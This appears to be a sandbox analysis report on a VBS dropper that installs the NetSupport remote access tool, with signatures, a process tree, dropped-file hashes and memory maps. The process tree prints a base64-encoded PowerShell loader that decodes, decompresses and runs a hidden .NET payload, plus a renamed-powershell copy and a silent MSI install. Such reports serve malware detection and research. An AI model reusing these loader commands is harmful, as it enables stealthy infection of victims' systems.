Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-11-2024 02:13

General

  • Target

    484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs

  • Size

    8.4MB

  • MD5

    c1108260f7a287cb16f93c11a40fbf90

  • SHA1

    8eab07aef27baae17d1ce013cce58b2b43dcaa1d

  • SHA256

    484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c

  • SHA512

    59d3023cc0287ff45894bbcce2175c8fda7a36b2f1687ab7b93fb49a578e38f874587bed0e3d69eff1a20deb4f20fc27c1155026bd962d007c9b0e8c028edc0c

  • SSDEEP

    49152:1uld2u6UP5rpZxEeMuatPwmOI06dzq5kz9zV7AujEy4q7YcGqaLjt1yLQ+RZyBvd:+P5j

Malware Config

Signatures

  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Netsupport family
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
  • Blocklisted process makes network request 5 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Executes dropped EXE 11 IoCs
  • Loads dropped DLL 64 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Modifies WinLogon 2 TTPs 1 IoCs
  • Drops file in System32 directory 8 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 15 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 44 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3568
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs"
        2⤵
        • Checks computer location settings
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:2008
        • C:\Users\Admin\AppData\Local\Temp\484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe
          "C:\Users\Admin\AppData\Local\Temp\484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe" -enc JABBAHEAdwB3AHMAYwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQAuAFIAZQBwAGwAYQBjAGUAKAAnAC4AZQB4AGUAJwAsACcAJwApADsAJABHAHkAaQBlAHAAZwBrAHcAdgByACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQAQQBxAHcAdwBzAGMAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQAWABzAGwAbQB3AG0AbwBxAGcAawB6ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEcAeQBpAGUAcABnAGsAdwB2AHIALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEkAdwBxAGIAdwBjACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAIAAsACAAJABYAHMAbABtAHcAbQBvAHEAZwBrAHoAIAApADsAJABFAG0AYgBtAGUAcwBqAHMAbAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQAUgB3AHAAdQB4AHcAYQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABJAHcAcQBiAHcAYwAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAUgB3AHAAdQB4AHcAYQAuAEMAbwBwAHkAVABvACgAIAAkAEUAbQBiAG0AZQBzAGoAcwBsACAAKQA7ACQAUgB3AHAAdQB4AHcAYQAuAEMAbABvAHMAZQAoACkAOwAkAEkAdwBxAGIAdwBjAC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQAWABzAGwAbQB3AG0AbwBxAGcAawB6ACAAPQAgACQARQBtAGIAbQBlAHMAagBzAGwALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAFgAcwBsAG0AdwBtAG8AcQBnAGsAegApADsAIAAkAE4AZgBrAGYAZwB0AHQAcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABoAHIAZQBhAGQAaQBuAGcALgBUAGgAcgBlAGEAZABdADoAOgBHAGUAdABEAG8AbQBhAGkAbgAoACkALgBMAG8AYQBkACgAJABYAHMAbABtAHcAbQBvAHEAZwBrAHoAKQA7ACAAJABBAHYAZgBuAHgAdQBrAG4AcgBtAG0AIAA9ACAAJABOAGYAawBmAGcAdAB0AHIALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIABbAFMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABBAHYAZgBuAHgAdQBrAG4AcgBtAG0ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAEEAdgBmAG4AeAB1AGsAbgByAG0AbQAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=
          3⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4788
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\50d669f573135aafd57c..vbs"
            4⤵
            • Blocklisted process makes network request
            • Checks computer location settings
            • System Location Discovery: System Language Discovery
            PID:4620
            • C:\Windows\SysWOW64\msiexec.exe
              "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\vrep.msi" /quiet
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:2700
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        2⤵
          PID:1728
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          2⤵
            PID:3844
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            2⤵
              PID:3680
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              2⤵
                PID:2484
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                2⤵
                  PID:4940
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  2⤵
                    PID:4792
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    2⤵
                      PID:2340
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      2⤵
                        PID:3252
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        2⤵
                          PID:644
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                          2⤵
                            PID:2924
                        • C:\Windows\system32\cmd.exe
                          cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\Admin\AppData\Local\Temp\484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe" /Y
                          1⤵
                          • Process spawned unexpected child process
                          PID:1460
                        • C:\Windows\system32\msiexec.exe
                          C:\Windows\system32\msiexec.exe /V
                          1⤵
                          • Blocklisted process makes network request
                          • Enumerates connected drives
                          • Drops file in Program Files directory
                          • Drops file in Windows directory
                          • Modifies data under HKEY_USERS
                          • Modifies registry class
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3124
                          • C:\Windows\syswow64\MsiExec.exe
                            C:\Windows\syswow64\MsiExec.exe -Embedding 3491AE4E981A159F3E67A7ED0A08B06A
                            2⤵
                            • Loads dropped DLL
                            • System Location Discovery: System Language Discovery
                            PID:2676
                          • C:\Windows\system32\cmd.exe
                            cmd.exe /c ATTRIB -R "C:\Users\Admin\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\\nsm.lic"
                            2⤵
                              PID:3520
                              • C:\Windows\SysWOW64\attrib.exe
                                ATTRIB -R "C:\Users\Admin\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\\nsm.lic"
                                3⤵
                                • System Location Discovery: System Language Discovery
                                • Views/modifies file attributes
                                PID:1464
                            • C:\Windows\Installer\MSI6065.tmp
                              "C:\Windows\Installer\MSI6065.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EU
                              2⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              PID:2452
                            • C:\Windows\syswow64\MsiExec.exe
                              C:\Windows\syswow64\MsiExec.exe -Embedding 95DAB45EA804E78DFBEFE2923D700012 E Global\MSI0000
                              2⤵
                              • Loads dropped DLL
                              • System Location Discovery: System Language Discovery
                              • Modifies registry class
                              PID:1680
                            • C:\Windows\Installer\MSI6483.tmp
                              "C:\Windows\Installer\MSI6483.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EU
                              2⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              PID:952
                            • C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe
                              "C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe"
                              2⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              PID:644
                            • C:\Windows\Installer\MSI6995.tmp
                              "C:\Windows\Installer\MSI6995.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EV"NetSupport School" /EF".\Log Files" /EF".\Bookmarks" /EF".\Tests" /EF".\Store" /EF".\inv" /EF".\Resources" /EF".\Help" /EF".\Image" /EF".\Sound" /EF".\Video" /EA /EX /EC /Q /V /Q /I *
                              2⤵
                              • Sets service image path in registry
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Modifies WinLogon
                              • Drops file in System32 directory
                              • Drops file in Program Files directory
                              • Drops file in Windows directory
                              • System Location Discovery: System Language Discovery
                              • Modifies registry class
                              • Suspicious behavior: EnumeratesProcesses
                              PID:4080
                              • C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe
                                winst64.exe /q /q /ex /i
                                3⤵
                                • Drops file in Drivers directory
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Drops file in System32 directory
                                • Modifies registry class
                                PID:4380
                            • C:\Windows\Installer\MSI706E.tmp
                              "C:\Windows\Installer\MSI706E.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EI
                              2⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              PID:4164
                            • C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe
                              "C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe" /Q "C:\Program Files (x86)\NetSupport\NetSupport Manager\Client32.ini"
                              2⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • System Location Discovery: System Language Discovery
                              PID:2884
                              • C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe
                                "C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe"
                                3⤵
                                • Executes dropped EXE
                                PID:2588
                          • C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                            "C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe" /* *
                            1⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Drops file in System32 directory
                            • System Location Discovery: System Language Discovery
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            PID:4524
                            • C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                              "C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe" * /VistaUI
                              2⤵
                              • Executes dropped EXE
                              • Enumerates connected drives
                              • Drops file in Program Files directory
                              • System Location Discovery: System Language Discovery
                              • Checks SCSI registry key(s)
                              • Checks processor information in registry
                              • Suspicious behavior: AddClipboardFormatListener
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of FindShellTrayWindow
                              PID:624
                              • C:\Windows\SysWOW64\cscript.exe
                                "cscript.exe" C:\Windows\system32\Printing_Admin_Scripts\en-US\prnport.vbs -a -r NSM001 -h 127.0.0.1 -o raw -n 65473
                                3⤵
                                • System Location Discovery: System Language Discovery
                                • Modifies data under HKEY_USERS
                                PID:4216
                          • C:\Windows\System32\svchost.exe
                            C:\Windows\System32\svchost.exe -k NetworkService -p -s TapiSrv
                            1⤵
                            • Modifies data under HKEY_USERS
                            PID:4896

                          Network

                          MITRE ATT&CK Enterprise v15

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\Config.Msi\e58533f.rbs

                            Filesize

                            41KB

                            MD5

                            bd595fec9219beafa4e536e287e46099

                            SHA1

                            8d44987157491f3972e5029dfb255337f2305450

                            SHA256

                            cde8c2f11cb2d42303158786ca599906aed96254b7ca12f5a1b7b4ee74d42559

                            SHA512

                            484c7e7e8e690383660636c08eb100cdc4d9fdfa10024e319a09b1f14f5f2828525af05270f058d3206660d57b49b45b379b7f684b3e056c595aaad9fdd2a97b

                          • C:\Program Files (x86)\NetSupport\NetSupport Manager\WINSTALL.EXE

                            Filesize

                            745KB

                            MD5

                            0fcf65c63e08e77732224b2d5d959f13

                            SHA1

                            5419b79fe14e21d1d5b51fe8187f7b86ec20de74

                            SHA256

                            f3e587f94a79c46a603b39286e93b17fabc895c6b71b26b0fc5d812cf155b7e5

                            SHA512

                            7c289aaf3ac1b998c8ca9593a58c8aa3a9aa9f41852c1ed4192b908e0ad51871400d585b4fe508d49368bdfc7378807d289971914870a7a47b0410a946e5e381

                          • C:\Users\Admin\AppData\Local\Temp\484c7f54d1b5a6fbbb5cbcf0a01a3b7b9ddb77a7bfbd859cf68bb29b686db80c.vbs.exe

                            Filesize

                            423KB

                            MD5

                            c32ca4acfcc635ec1ea6ed8a34df5fac

                            SHA1

                            f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

                            SHA256

                            73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

                            SHA512

                            6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

                          • C:\Users\Admin\AppData\Local\Temp\50d669f573135aafd57c..vbs

                            Filesize

                            2KB

                            MD5

                            905ad4c0382eae16df4c0dea8e4d2fcc

                            SHA1

                            6597192580595528a3a24cf94c4b44e44cfa6be4

                            SHA256

                            49f4e7cdd3716a8e33a6659daa709606a4d74ae84525fa395efd8687f7e9d2ae

                            SHA512

                            cc5784d1da871001a838d9ea2ac774cc727cb0d0f8cb76f05ae76fd35fd4bff86bf3418b4abf32f9477f25fbb7710a3fc961072cc95e1a4afd83c7a19dcbaa09

                          • C:\Users\Admin\AppData\Local\Temp\DLL_{CBB68368-7767-4CFF-B3E5-211488346702}.ini

                            Filesize

                            7KB

                            MD5

                            3330e2d841e410e4e252d1cf3cbe4045

                            SHA1

                            8f127bb2c17b9842d43d1c6e335acc56814d5dfd

                            SHA256

                            ab1a86f4cf092f2cb713f5024c859ac6562303200cdb66b63465cda70104c499

                            SHA512

                            33c5aa201ff8e71d33462fc1976d28897c0ef9b9a6bb863167ef583077fd2c4a3c54bb474358b232095a56f39e672a747a186ef5b4961805166cb6d35e59c59f

                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vop3nxdv.q3q.ps1

                            Filesize

                            60B

                            MD5

                            d17fe0a3f47be24a6453e9ef58c94641

                            SHA1

                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                            SHA256

                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                            SHA512

                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                          • C:\Users\Admin\AppData\Local\Temp\vrep.msi

                            Filesize

                            39.7MB

                            MD5

                            87ef82757aba83e7eb63c7c35dbae97a

                            SHA1

                            7418c4ddeecba68e253e89622ad9ca45597d9350

                            SHA256

                            79040421b5a48dcc6e611dfe187b2f3e355791ad8511adb84f5c0948aa1d6c89

                            SHA512

                            605495995a07d7dfaa5d8f09b9d5bde1e0281b5b6581923b9fbd7c103e5ca9f2bb8dcf8e1049c21bd90ac4d68759270d5453e0414c2f6e1eb3ef877eee1a5533

                          • C:\Users\Admin\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\NSM.LIC

                            Filesize

                            253B

                            MD5

                            d2c2217861f5535686409d80a0867f6f

                            SHA1

                            f4d90bebfcf8f501e5b9f0427028f696c3a191c7

                            SHA256

                            af9c79cf3af6a7e969208da78dfcfac54d6f956545b46f434d0e447cff94807b

                            SHA512

                            656deac03f9d81792e3d78108fb7d6754ca4a21a30f0e8da72e71f64b0b015dfc299d5478a8cc27acb05a0ec7e01c2c1cfcc9eb40041e4fe0a790414e42b4a37

                          • C:\Users\Admin\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\product.dat

                            Filesize

                            506B

                            MD5

                            ff7c0d2dbb9195083bbabaff482d5ed6

                            SHA1

                            5c2efbf855c376ce1b93e681c54a367a407495dc

                            SHA256

                            065d817596d710d5a06060241acc207b82b844530cc56ff842ff53d8ff92a075

                            SHA512

                            ea226b3a55fc59175136f104df497ebf5055624fb1c1c8073b249dfc5e1ed5818a6feee995aa82cf9ed050f1adc7a62994c90b1af03569dfe0d4551ee2bc70c9

                          • C:\Windows\Installer\MSI58E9.tmp

                            Filesize

                            169KB

                            MD5

                            0e6fda2b8425c9513c774cf29a1bc72d

                            SHA1

                            a79ffa24cb5956398ded44da24793a2067b85dd0

                            SHA256

                            e946b2fae0b36c43064463a8c16a2774adac30c4188c5af90e9338b903c501c9

                            SHA512

                            285bb7759a1214abed36162ac8be2d48df17a05278c4de97562448e20fd43b635563a6819f37e23d92a5f5ed0205a68bffe43dac0d3a67513bd0303b4e7f89aa

                          • C:\Windows\Installer\MSI59B5.tmp

                            Filesize

                            511KB

                            MD5

                            d524b639a3a088155981b9b4efa55631

                            SHA1

                            39d8eea673c02c1522b110829b93d61310555b98

                            SHA256

                            03d91c8cd20b846625a092a3dae6a12369930c65d6216a455a00449ebb0dc289

                            SHA512

                            84f8ab54122f93a40da08fd83bca767ab49eb0f73c4ab274d9bda11dd09224134df011fa02e5a3abbafcc6fbef6a60673dd48feabdf829a1e22c85a2a759b7ac

                          • C:\Windows\Installer\MSI59C5.tmp

                            Filesize

                            487KB

                            MD5

                            3085d62326cc1ae4ab21489576973621

                            SHA1

                            e3c847dee0ecc7176c1168d6d1df9b9e98b19936

                            SHA256

                            d2dc425f47d8c80abd8cadbcd8aa53516e7754c371bd3bad3907294a6ca57c5c

                            SHA512

                            f993e4e04b348f7eb346d2f3d00fdaed2212f28ba885bbe50c1959737c5b6cab9cfbe17c4aba992521aa0ecdcf5216fa9e6c36a47746077307d32170223a9a97

                          • C:\Windows\Installer\MSI5A55.tmp

                            Filesize

                            153KB

                            MD5

                            a1b7850763af9593b66ee459a081bddf

                            SHA1

                            6e45955fae2b2494902a1b55a3873e542f0f5ce4

                            SHA256

                            41b8e92deba5206c78817236ed7f44df95636ca748d95fab05f032f5aec186af

                            SHA512

                            a87a302a9a0d19d7ce293b42f5e7bc09664b21307a5321f226157fcc57eb2df2b59c6651878cb23969a182c82b55e8671ff00f8462194b81a907974a49cb25b1

                          • C:\Windows\Installer\MSI6DAD.tmp

                            Filesize

                            244KB

                            MD5

                            c4ca339bc85aae8999e4b101556239dd

                            SHA1

                            d090fc385e0002e35db276960a360c67c4fc85cd

                            SHA256

                            4ab23609cdc64d10b97c9ccb285ed7100f55d54d983cd50762da25ecac4357f9

                            SHA512

                            9185ec32545fc838d7fef6c9e4dd222dd02114c661b0b344f16287d55e6571bfe7a4233a852acc579d07bcdbab18c5c034c465b1f4bb78535ed51c3499087fe0

                          • memory/4788-52-0x000000000A980000-0x000000000AF33000-memory.dmp

                            Filesize

                            5.7MB

                          • memory/4788-73-0x000000000A980000-0x000000000AF33000-memory.dmp

                            Filesize

                            5.7MB

                          • memory/4788-23-0x0000000007080000-0x0000000007116000-memory.dmp

                            Filesize

                            600KB

                          • memory/4788-24-0x00000000065F0000-0x000000000660A000-memory.dmp

                            Filesize

                            104KB

                          • memory/4788-25-0x0000000006640000-0x0000000006662000-memory.dmp

                            Filesize

                            136KB

                          • memory/4788-26-0x00000000076D0000-0x0000000007C74000-memory.dmp

                            Filesize

                            5.6MB

                          • memory/4788-27-0x0000000008300000-0x000000000897A000-memory.dmp

                            Filesize

                            6.5MB

                          • memory/4788-28-0x0000000007C80000-0x000000000826E000-memory.dmp

                            Filesize

                            5.9MB

                          • memory/4788-29-0x000000000A980000-0x000000000AF38000-memory.dmp

                            Filesize

                            5.7MB

                          • memory/4788-30-0x000000000AF40000-0x000000000AFD2000-memory.dmp

                            Filesize

                            584KB

                          • memory/4788-32-0x000000000A980000-0x000000000AF33000-memory.dmp

                            Filesize

                            5.7MB

                          • memory/4788-36-0x000000000A980000-0x000000000AF33000-memory.dmp

                            Filesize

                            5.7MB

                          • memory/4788-46-0x000000000A980000-0x000000000AF33000-memory.dmp

                            Filesize

                            5.7MB

                          • memory/4788-48-0x000000000A980000-0x000000000AF33000-memory.dmp

                            Filesize

                            5.7MB

                          • memory/4788-44-0x000000000A980000-0x000000000AF33000-memory.dmp

                            Filesize

                            5.7MB

                          • memory/4788-42-0x000000000A980000-0x000000000AF33000-memory.dmp

                            Filesize

                            5.7MB

                          • memory/4788-40-0x000000000A980000-0x000000000AF33000-memory.dmp

                            Filesize

                            5.7MB

                          • memory/4788-34-0x000000000A980000-0x000000000AF33000-memory.dmp

                            Filesize

                            5.7MB

                          • memory/4788-38-0x000000000A980000-0x000000000AF33000-memory.dmp

                            Filesize

                            5.7MB

                          • memory/4788-31-0x000000000A980000-0x000000000AF33000-memory.dmp

                            Filesize

                            5.7MB

                          • memory/4788-56-0x000000000A980000-0x000000000AF33000-memory.dmp

                            Filesize

                            5.7MB

                          • memory/4788-54-0x000000000A980000-0x000000000AF33000-memory.dmp

                            Filesize

                            5.7MB

                          • memory/4788-21-0x00000000060C0000-0x00000000060DE000-memory.dmp

                            Filesize

                            120KB

                          • memory/4788-50-0x000000000A980000-0x000000000AF33000-memory.dmp

                            Filesize

                            5.7MB

                          • memory/4788-60-0x000000000A980000-0x000000000AF33000-memory.dmp

                            Filesize

                            5.7MB

                          • memory/4788-68-0x000000000A980000-0x000000000AF33000-memory.dmp

                            Filesize

                            5.7MB

                          • memory/4788-64-0x000000000A980000-0x000000000AF33000-memory.dmp

                            Filesize

                            5.7MB

                          • memory/4788-62-0x000000000A980000-0x000000000AF33000-memory.dmp

                            Filesize

                            5.7MB

                          • memory/4788-58-0x000000000A980000-0x000000000AF33000-memory.dmp

                            Filesize

                            5.7MB

                          • memory/4788-22-0x0000000006150000-0x000000000619C000-memory.dmp

                            Filesize

                            304KB

                          • memory/4788-70-0x000000000A980000-0x000000000AF33000-memory.dmp

                            Filesize

                            5.7MB

                          • memory/4788-66-0x000000000A980000-0x000000000AF33000-memory.dmp

                            Filesize

                            5.7MB

                          • memory/4788-80-0x000000000A980000-0x000000000AF33000-memory.dmp

                            Filesize

                            5.7MB

                          • memory/4788-88-0x000000000A980000-0x000000000AF33000-memory.dmp

                            Filesize

                            5.7MB

                          • memory/4788-92-0x000000000A980000-0x000000000AF33000-memory.dmp

                            Filesize

                            5.7MB

                          • memory/4788-90-0x000000000A980000-0x000000000AF33000-memory.dmp

                            Filesize

                            5.7MB

                          • memory/4788-86-0x000000000A980000-0x000000000AF33000-memory.dmp

                            Filesize

                            5.7MB

                          • memory/4788-84-0x000000000A980000-0x000000000AF33000-memory.dmp

                            Filesize

                            5.7MB

                          • memory/4788-82-0x000000000A980000-0x000000000AF33000-memory.dmp

                            Filesize

                            5.7MB

                          • memory/4788-78-0x000000000A980000-0x000000000AF33000-memory.dmp

                            Filesize

                            5.7MB

                          • memory/4788-76-0x000000000A980000-0x000000000AF33000-memory.dmp

                            Filesize

                            5.7MB

                          • memory/4788-74-0x000000000A980000-0x000000000AF33000-memory.dmp

                            Filesize

                            5.7MB

                          • memory/4788-94-0x000000000A980000-0x000000000AF33000-memory.dmp

                            Filesize

                            5.7MB

                          • memory/4788-476-0x0000000074C3E000-0x0000000074C3F000-memory.dmp

                            Filesize

                            4KB

                          • memory/4788-503-0x0000000074C30000-0x00000000753E0000-memory.dmp

                            Filesize

                            7.7MB

                          • memory/4788-760-0x0000000074C30000-0x00000000753E0000-memory.dmp

                            Filesize

                            7.7MB

                          • memory/4788-1185-0x000000000B2F0000-0x000000000B818000-memory.dmp

                            Filesize

                            5.2MB

                          • memory/4788-20-0x0000000005B20000-0x0000000005E74000-memory.dmp

                            Filesize

                            3.3MB

                          • memory/4788-10-0x0000000005280000-0x00000000052E6000-memory.dmp

                            Filesize

                            408KB

                          • memory/4788-9-0x00000000051A0000-0x0000000005206000-memory.dmp

                            Filesize

                            408KB

                          • memory/4788-8-0x0000000005100000-0x0000000005122000-memory.dmp

                            Filesize

                            136KB

                          • memory/4788-6-0x0000000074C30000-0x00000000753E0000-memory.dmp

                            Filesize

                            7.7MB

                          • memory/4788-7-0x00000000054F0000-0x0000000005B18000-memory.dmp

                            Filesize

                            6.2MB

                          • memory/4788-5-0x0000000002B20000-0x0000000002B56000-memory.dmp

                            Filesize

                            216KB

                          • memory/4788-4-0x0000000074C3E000-0x0000000074C3F000-memory.dmp

                            Filesize

                            4KB

                          • memory/4788-1186-0x00000000075F0000-0x000000000763C000-memory.dmp

                            Filesize

                            304KB

                          • memory/4788-1190-0x000000000B190000-0x000000000B1E4000-memory.dmp

                            Filesize

                            336KB

